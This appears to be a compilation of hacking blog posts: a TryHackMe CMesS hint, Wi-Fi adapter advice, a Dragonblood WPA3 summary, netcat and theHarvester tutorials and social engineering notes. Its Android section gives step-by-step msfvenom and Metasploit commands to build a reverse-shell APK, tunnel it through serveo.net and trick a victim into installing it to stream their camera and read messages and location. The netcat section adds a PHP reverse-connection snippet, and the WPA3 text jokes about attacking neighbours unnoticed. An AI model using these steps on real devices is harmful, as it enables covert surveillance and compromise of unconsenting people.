TryHackMe CMeeS

 First Scanning:

i use both nmap and rustscan(if you don't known about rustscan its nmap -p- on steroids) 

nmap -sC -sV --min-parallelsim 64 -oN nmap/nmapfile $target-ip

the rustscan didn't gave anything new.

Checking if the website has any sub-domains

wfuzz -c -f sub-fighter -w wordlist.txt -u http://cmess.thm -H "Host :FUZZ.cmess.thm" -hw 290

Target: http://cmess.thm/

Total requests: 4997

==================================================================

ID    Response   Lines      Word         Chars          Request    

==================================================================

00019:  C=200     30 L      104 W     934 Ch   "dev"

Total time: 0

Processed Requests: 2990

Filtered Requests: 2989

Requests/sec.: 0

Used gobuster for hunting down secret directories but no luck:

Check out the subdomain some good suff there.

got into the CMS of the website:

Now the hint is find what CMS is the website is using and use searchsploit

+found local file inclusion

+go to exploit-db now you know where to go 

Thats all for the initial hints if you really want to see the what i did goto my github page and enter the user flag don't bruteforce it.

https://gitlab.com/jdp1369/THM_CMesS.git

Wi-Fi Attacks Pre-Requisites

 

There are N number of ways to compromise a Wi-Fi router but generally you can't directly attack because your systems Wi-Fi module does not support Monitor Mode and Packet Injection. And also if you are using a virtual Kali Machine to perform a Wi-Fi attack then certainly you were unable to do so because Virtualized generally uses NAT (Network Address Translation) network which creates a subnet inside your machine where your host operating system acts a router to the VMs(Virtual Machines) so you don't really have a direct access to the real router.

What is Monitor Mode and Packet Injection?

Monitor Mode: or RFMON (Radio Frequency MONitor) mode, allows a computer with a wireless network interface controller (WNIC) to monitor all traffic received on a wireless channel. Unlike promiscuous mode, which is also used for packet sniffing, monitor mode allows packets to be captured without having to associate with an access point or ad hoc network first. Monitor mode only applies to wireless networks, while promiscuous mode can be used on both wired and wireless networks. Monitor mode is one of the eight modes that 802.11 wireless cards can operate in: Master (acting as an access point), Managed (client, also known as station), Ad hoc, Repeater, Mesh, Wi-Fi Direct, TDLS and Monitor mode.

Packet Injection: also known as forging packets or spoofing packets in computer networking, is the process of interfering with an established network connection by means of constructing packets to appear as if they are part of the normal communication stream. The packet injection process allows an unknown third party to disrupt or intercept packets from the consenting parties that are communicating, which can lead to degradation or blockage of users' ability to utilize certain network services or protocols. Packet injection is commonly used in man-in-the-middle attacks and denial-of-service attacks. 

Whats the solution?

Solution is to use a new Wi-Fi module which supports the Monitor Mode and Packet Injection, this solution in only viable if you are not using Kali Linux as a VM. But if you are using it as a VM then use an external Wi-Fi adapter.

Which adapter to choose?

Actually here the brand does not really matter that much, here you should looking for the correct chipset. Though the brand like Alfa have better injection rates and less chances of failures, then that of created by the local brands, but according to me chipset is the only thing which matters if you are just started learning Wi-Fi attacks and trying to attempt the attacks.

The following Chipset one should look for in a Wi-Fi adapter:

1.  Atheros AR9271: This one is only capable to attack on a router working on 2.4GHz frequency.
2.  Realtek RTL8812AU: This one is capable to attack on both 2.4GHz&5GHz frequency.
3.  Ralink 3070/2870: It supports 2.4GHz frequency but I don't trust this chipset. 

Some Products which I/my friend have used  

Alfa AWSS036ACH

 

• Alfa AWUS036NHA [b/g/n USB]
• Alfa AWUS036ACH(a/b/g/n/ac) is the best performing card, but the driver can be unstable enough to crash your kernel
• Alfa AWUS036ACM (a/b/g/n/ac) is the highest performing of the STABLE devices, but it requires kernel 4.19.5 or higher, and the driver doesn't work on the Raspberry Pi yet
• TP-Link TL-WN722N v1(b/g/n) :[NOTE:Only the gen1 not gen2]
• Ubiquiti SRX [a/b/g Cardbus]
• Ubiquiti SRC  [a/b/g ExpressCard]

Where you can buy these things?

You can buy these form Amazon (website), Aliexpress and other well known online retailer but for some local made adapters you can check out your near by computer market and ask about adapters with Monitor Mode and Packet Injection, or you can also find some adapters on Zsecurity. 

link to buy from amazon India : https://amzn.to/2PsoBiw

  

You ask question in the comment section if you have any kind of doubts regarding the hardware.

DragonBlood WPA3 FLaws

 As we known WPA2 has been the latest and the greatest in the terms of WiFi security for a long time now, you might have also already heard/read about the WPA3 and how its going to replace WPA2 as its more secure.

But in mid April 2019 researchers Mathy Fanhouf and Eal Ronan published a research paper in which they analysed the Dragonfly handshake, this is the handshake used the WPA3 replacing the Vulnerable 4 way handshake in WPA, in this paper they detailed a number of flaws that can be used to launch a number attacks against the latest and the greatest wifi security protocol WPA3.

What are the potential threats generated by this flaw?
The major one are as follows:
1.> Recovering the network key
2.> Downgrade Security <wpa3 to wpa2>
3.> Launching DOS attacks

In there research paper "Dragonblood: Analyzing the DragonflyHandshake of WPA3 and EAP-pwd" the mentioned that the one of the supposed advantages of the WPA3 was its more secure than WPA2, due to its underlying Dragonfly handshake, it's near impossible to crack the network key/password.But they found out that even with WPA3, an attacker within range of the victim can still recover the password.

The following CVEs were allocated for these new finding of vulnerabilities:
1-> CVE-2019-13377: Timing-based side-channel attack against WPA3's Dragonfly handshake when using Brainpool curves.
2-> CVE-2019-13456: Informatoin leak in FreeRadius' EAP-pwd due to aborting when needing more than 10 iterations. 

DETAILS
Flaws in WPA3

The design flaws discovered can be divided into 2 categories. First category consist of downgrading attacks against WPA3-capable devices, and second consists of the weakness in the dragonfly handshake of WPA3, which in WI-FI standard is better known as the SAE(Simultaneous Authentication of Equals) handshake.The discoverd flaws can be abused to recover the password of the Wi-Fi network, launch resource consumption attacks, and force devices into using weaker security groups.
The following Vulnerability were found in WPA3:

1. CERT ID #VU871675: Downgrade attack against WPA3-Transtition mode leading to dictionary attacks.
2. CERT ID #VU871675: Security group downgrade attack against WPA3's Dragonfly handshake.
3. CVE-2019-9494: Timing-based side-channel attack against WPA3's Dragonfly handshake.
4. CVE-2019-9494: Cache-based side-channel attack against WPA3's Dragonfly handshake.
5. CERT ID #VU871675: Resource consumption attack (i.e. denial of service) against WPA3's Dragonfly handshake.

Flaws in EAP-pwd

The EAP-pwd protocol internally also uses Dragonfly, and provides authentication based on a username and password in certain enterprise Wi-Fi networks. It is vulnerable to the same attacks that are discovered against WPA3.On the top of that, all the implementations of the EAP-pwd that we tested were vulnerable to invalid curve attacks, which enable to adversary to complete bypass authentication. Most implementaion were also vulnerable to reflection attacks.

The following vulnerabilites were found in the EAP-pwd implementaions:

1. CERT ID #VU871675: Overview of attacks specific to hostapd and wpa_supplicant (does not cover other implementations).
2. CVE-2019-9495: Cache-based side-channel attack against the EAP-pwd implementation of hostapd and wpa_supplicant.
3. CVE-2019-9497: Reflection attack against the EAP-pwd implementation of hostapd and wpa_supplicant.
4. CVE-2019-9498: Invalid curve attack against the EAP-pwd server of hostapd resulting in authentication bypass.
5. CVE-2019-9499: Invalid curve attack against the EAP-pwd client of wpa_supplicant resulting in server impersonation.
6. CVE-2019-11234: Reflection attack against the EAP-pwd implementation of FreeRADIUS.
7. CVE-2019-11235: Invalid curve attack against the EAP-pwd server of FreeRADIUS resulting in authentication bypass.

TOOLs
These tools are not designed to attack your neighbor's WPA3<but if you do & not got caught then every thing is good>,

• Dragonslayer: performs invalid curve attacks against EAP-pwd clients and server. These attacks bypass authentication: an adversary only needs to possess a valid username.
• Dragondrain: this tool can be used to test wether, or to which extend, an Access Point is vulnerable to denial-of-service attacks against WPA3's SAE handshake.
• Dragontime: this is an experimental tool to perform timing attacks against the SAE handshake if MODP group 22, 23, or 24 are supported. Note that most WPA3 implementations by default do not enable these groups.
• Dragonforce: this is an experimental tool which takes the information recovered from our timing or cache-based attacks, and performs a password partitioning attack. This is similar to a dictionary attack.

In practice the main risks for WPA3 are downgrade attacks, and possible timing attacks against resource-constrained devices. The authentication bypass attacks against EAP-pwd that are implemented in Dragonslayer are also security critical in practice. Considering the other attacks are non-trivial in practice, and assuming vendors will implement defenses against them, we expect that your neighbour won't abuse them to attack you. 


Content Reference :

• https://www.youtube.com/watch?v=-Qc23Pn9bTU
• https://wpa3.mathyvanhoef.com/
• https://eprint.iacr.org/2019/383.pdf

Breaking into android

  

Hello all, As we know the large part of society is using smart phones , without knowing its adverse disadvantages on their privacy. So  today i am going to teach you how to hack android devices with the Metasploit framework on different network.

After getting meterpreter session attacker can do many thing such as:

• hack camera live stream.
• take screen shots of mobile display.
• hack msgs.
• call from your number.
• gps location.
• hacking another devices etc.

PRE-REQUIREMENT:-

1. Kali OS
2. Updated Metasploit Framework.
3. Social Engineering. 

This blog is for educational purpose and not responsible for illegal activities .

1.Get the ip address of your network.
for this enter the following command in terminal. 

• ifconfig

As you can see my ip address is 192.168.23.168 and your may be different from me.

2.Host your local host on internet by port forwarding on serveo.net.

 syntax:-   ssh -R src_port:ip_address:dest_port serveo.net

example

• ssh -R  8565:192.168.23.168:4444

this basically forward the request to your ip address from serveo.net.

3.Make a payload using msfvenom.

• msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=8565 -o payload.apk 

4.Open a listener to get the meterpreter session.

type :- 

• msfconsole
• use exploit/multi/handler
• set payload android/meterpreter/reverse_tcp 
• set lhost ip-add
• set lport 4444
• run

5.Social engineering 

send it to your victim by any way and install payload.apk in victim android mobile.

Once it installed and open by victim the meterpreter session has been established as shown below.

6.Exploit 

type :

• help 

as you can see all the command are given.you can do whatever you want.

Example:-

i want the victim camera's live stream 

type  

• webcame_list //this will give you the list of webcam present on your victim machine. 
• webcam_stream 1  //will give you the live stream as shown below.

Using netcat for hacking

 

Netcat is a great network utility for reading and writing to network connections using the TCP and UPD protocol. Netcat is often referred to as the Swiss army knife in networking tools and we will be using it a lot throughout the different tutorials on Hacking Tutorials. Most common use for Netcat when it comes to hacking is setting up reverse and bind shells, piping and redirecting network traffic, port listening, debugging programs and scripts and banner grabbing. In this tutorial we will be learning how to use the basic features from Netcat such as: 

1. Banner grabbing
2. Webserver interaction
3. File transfers

Banner Grabbing

Service banners are often used by system administrators for inventory taking of systems and services on the network. The service banners identify the running service and often the version number too. Banner grabbing is a technique to retrieve this information about a particular service on an open port and can be used during a penetration test for performing a vulnerability assessment. When using Netcat for banner grabbing you actually make a raw connection to the specified host on the specified port. When a banner is available, it is printed to the console. Let’s see how this works in practice.

The following command is used the grab a service banner (make a raw connection to a service):

• nc [ip address][port]

Let’s try this on the FTP service on Metasploitable 2 which is running on port 21:

• nc 192.168.100.100 21

Web server interaction

Netcat can also be used to interact with webservers by issuing HTTP requests. With the following command we can grab the banner of the web service running on Metasploitable 2:

• nc 192.168.100.108 80

And then run this HTTP request:

HEAD / HTTP/1.0





Apache webserver banner.

The webserver responds with the server banner: Apache/2.2.8 (Ubuntu) DAV/2 and the PHP version.

To retrieve the top level page on the webserver we can issue the following command:

• nc 192.168.100.108 80

And then run this HTTP request:

GET / HTTP/1.0

File transfers with Netcat

In this example we will be using a Netcat connection to transfer a text file. Let’s assume we have remote command execution on the target host and we want to transfer a file from the attack box to the host. First we would need to set up a listener on the target host and connect to it from the attack box. We will be using port 8080 for this purpose and we safe the file to the desktop:

• nc -lvp 8080 > /root/Desktop/transfer.txt

On the attack box we connect to port 8080 and send a file name transfer.txt:

• nc 192.168.100.107 8080 < /root/Desktop/transfer.txt

This Netcat reverse connection

It is used in system hacking and web server hacking and also inject in php processing file.

Example

• <?php
• system(nc 192.168.100.107 8080);
• ?>

it gives you back connection on port 8080.

After you can listen on your system  by :

• nc -l -p 8080

The Harvester

 'theHarvester' is a tool designed to be used in Information Gathering Phase of a penetration testing.

theHarvester is a tool used to harvest/gather sensitive information that can help in determining a company's external threat landscape on the internet. Not just company but even individual information of particular users available on the internet. 'theHarvester' largely depends on public sources and the following info can be gathered,

• Emails
• Names
• Subdomains
• IPs
• URLs
• VirtualHosts
• Even Port Scanning

 TheHarvester Public engine

One of the interesting things about ‘theHarvester’ is that it supports more than one public source to harvest information. These sources appear to be more than 20+ public sources supported by the information gathering tool.

And this public sources that require API include:

• SecurityTrails
• Hunter
• GitHub
• Shodan
• bingapi
• Spyse
• Intelx

But if you don't have API you can still use some other public sources

Harvester on ubuntu/other linux based system where its not preinstalled

You just have to have some major dependencies on the system particular python3.6+. Some of its major dependencies include:

⦁ Python 3.7+
⦁ Python3 -m pip install pipenv
⦁ Pipenv install

virtualenv -p python3 theharvester

git clone https://github.com/laramies/theHarvester.git 

Source theharvester/bin/activate




Social Engineering

 Spend Millions of Dollars $$ then also got hacked, while your servers ran on the latest security updates and patches, completely hardened, Then it might be a social engineering attack.

Remember the movie "Catch me If you can" ,  Frank Abagnale Jr used social engineering in almost the whole movie.

There is no single security mechanism/technical way that can prevent from social engineering techniques used by attackers. Only educating employees on how to recognize and respond to social engineering attacks can minimize attackers' chances of success. Before going ahead with this  module, let's first discuss various social engineering concepts.

 

What is Social Engineering?

Social engineering is the art of convincing people to reveal confidential information.

Common targets of social engineering include help desk personnel, technical support executives, system admins, etc.

Social engineering depend on the fact that people are unaware of their valuable information and are careless about protecting it.

Impact of Attack on Organization 

1. Economic losses 
2. Damage of goodwill 
3. Loss of privacy
4. Dangers of terrorism 
5. Lawsuits and arbitration 
6. Temporary or permanent closure

 Factors that Make Companies Vulnerable to Attacks

• Insufficient security training 
• Unregulated access to the information
• Several organization units
• lack of security policies

Why is Social Engineering Effective ?

• Security policies are as strong as their weakest link, and humans are the most susceptible factor
• Its is difficult to detect social engineering attempts
• There is no method that can be applied to ensure complete security form social engineering attacks
• There is no specific software or hardware for defending against a social engineering attack

Phases of a Social Engineering Attack

• Research on Target Company {Dumpster driving, websites, employees, tour company, etc.}
• Select Victim {Identify the frustrated employees of the target company} 
• Develop Relationship {With the victim in order to gains its trust}
• Exploit in the Relationship {Collect sensitive account and financial information, and current technologies}   

Types of Social Engineering 

• Human-based Social Engineering:

>>>Gathers sensitive information by interaction
>>>Techniques: Impersonation, Vishing, Shoulder Surfing, Reverse Social Engineering, Dumpster Driving, Piggybacking etc

• Computer-based Social Engineering:

>>>Social engineering is carried out with the help of computers
>>>Techniques: Phishing, Spam Mail, Pop-up Window Attack, Instant Chat Messenger

• Mobile-based Social Engineering:

>>>It is carried out with the help of mobile applications
>>>Techniques: Publishing Malicious Apps, Repacking Legitimate Apps, Using Fake Security Applications, SMShing (SMS Phishing)